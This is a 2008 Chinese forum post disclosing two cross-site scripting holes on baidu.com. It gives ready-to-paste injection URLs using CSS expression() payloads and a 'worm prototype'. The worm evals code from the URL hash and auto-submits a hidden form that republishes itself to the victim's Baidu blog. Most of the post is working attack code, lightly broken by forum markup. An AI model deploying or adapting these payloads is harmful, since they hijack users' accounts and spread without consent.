baidu的2个XXS点
呵呵,这次是百度倒霉![size=2][color=#ff6600][url=http://www.baidu.com/index.php?tn="/**/style=xss:expression(alert(]http://www.baidu.com/index.php?tn="/**/style=xss:expression(alert('sunzn-xss'[/url]));[/color][/size]
[size=2][color=#ff6600][url=http://www.baidu.com/index.php?bar="/**/style=xss:expression(alert(]http://www.baidu.com/index.php?bar="/**/style=xss:expression(alert('sunzn-xss'[/url]));[/color][/size]
复制代码的时候一定要连后面的分号也复制到地址栏中,才能看到XXS的效果!
下面还有一个Worm原型
Run Once:[font=NSimsun][url=http://www.baidu.com/index.php?bar="/**/style=xss:expression((window.r!=1)?eval(]http://www.baidu.com/index.php?bar="/**/style=xss:expression((window.r!=1)?eval('window.r=1;eval(unescape(location.hash.substr(1)))'):1);#alert%28%29[/url][/font]
[font=新宋体][/font]
[size=2][color=#ff6600]<div id="xssworm">.
<form name="form1" id="popFormSubmit" action="[/color][/size][size=2][color=#ff6600]" method="post">
<input type="hidden" name="ct" value="1">
<input type="hidden" name="cm" value="1">
<input type="hidden" id="url" name="spRefURL" value="">
<input type="hidden" id="title" name="spBlogTitle" value="百度又有新漏洞啦">
<input type="hidden" id="content" name="spBlogText" value="">
<input type="hidden" name="spBlogCatName" value="默认分类">
<input type="hidden" name="spIsCmtAllow" value="1">
<input type="hidden" name="spBlogPower" value="0">
<input type="hidden" name="spVcode" value="">
<input type="hidden" name="spVerifyKey" value="">
<input type="hidden" name="tj" value=" 发表文章 " >
</form>
<script>
[/color][/size][size=2][color=#ff6600]function $(i){return document.getElementById(i);}
window.onload = function(){
var j=document.body.innerText;
var i=j.indexOf("|");
j=j.substr(0,i);
form1.action = "[/color][/size][url=http://hi.baidu.com/%22+j+%22/commit][size=2][color=#ff6600]http://hi.baidu.com/"+j+"/commit[/color][/size][/url][size=2][color=#ff6600]";
$("content").value = escape($("xssworm").outerHTML);
form1.submit();
}
</script>
</div>[/color][/size]
[[i] 本帖最后由 sunzn 于 2008-6-30 22:10 编辑 [/i]]
页:
[1]